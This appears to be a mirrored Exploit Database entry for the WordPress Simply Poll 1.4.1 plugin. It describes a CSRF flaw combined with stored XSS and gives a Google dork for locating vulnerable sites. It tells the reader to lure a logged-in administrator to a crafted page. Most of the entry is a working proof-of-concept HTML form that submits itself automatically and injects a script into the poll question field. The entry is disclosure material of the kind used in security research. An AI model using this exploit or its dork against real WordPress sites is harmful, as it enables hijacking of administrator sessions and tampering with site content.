WordPress Plugin Simply Poll 1.4.1 – Multiple Vulnerabilities

• Exploit Database
• 10 阅读

• 作者： m3tamantra
  日期： 2013-03-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/24850/

• # Exploit Title: WordPress Simply Poll Plugin 1.4.1 CSRF and stored XSS
  # Google Dork: inurl:"/wp-content/plugins/simply-poll
  # Date: 16.03.2013
  # Exploit Author: m3tamantra
  # Vendor Homepage: http://wordpress.org/extend/plugins/simply-poll/
  # Software Link: http://downloads.wordpress.org/plugin/simply-poll.1.4.1.zip
  # Version: 1.4.1
  # Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli)
  
  Note: After a email to plugins@wordpress.org, "Simply Poll Plugin" was deleted.
  
  Description:
  - The question parameter is vulnerable to XSS
  - Simply Poll has an CSRF vulnerability (Polls=>Add New) 
  
  The PoC leads to arbitrary javascript execution in back-end area.
  
  Steps to exploit the Flaw:
  - Save PoC code in html file
  - Send a link (pointing to the PoC html file) to a logged in admin
  - When Admin view the Page he will automatically add a new Poll which exploits an XSS vulnerability in the question parameter
  - When the admin views the Polls the javascript Code will execute
  
  Note: this was just an example, it is also possible to remove, reset and edit all Polls.
  
  [code]
  <html>
  <head>
  <title>Simply Poll CSRF and XSS</title>
  </head>
  <body>
  <!-- replace "127.0.0.1:9001/wordpress" -->
  <form action="http://127.0.0.1:9001/wordpress/wp-admin/admin.php?page=sp-add" method="post">
  <input type="hidden" name="question" value='Is CSRF+XSS possible?<script>alert(1)</script>' />
  <input type="hidden" name="answers[1][answer]" value="yes" />
  <input type="hidden" name="answers[2][answer]" value="no" />
  <input type="hidden" name="answers[3][answer]" value="maybe" />
  <input type="hidden" name="answers[4][answer]" value="" />
  <input type="hidden" name="answers[5][answer]" value="" />
  <input type="hidden" name="answers[4][answer]" value="" />
  <input type="hidden" name="answers[6][answer]" value="" />
  <input type="hidden" name="answers[7][answer]" value="" />
  <input type="hidden" name="answers[8][answer]" value="" />
  <input type="hidden" name="answers[9][answer]" value="" />
  <input type="hidden" name="answers[10][answer]" value="" />
  <input type="hidden" name="polledit" value="new" />
  </form>
  <script>document.forms[0].submit();</script>
  
  </body>
  </html>
  [/code]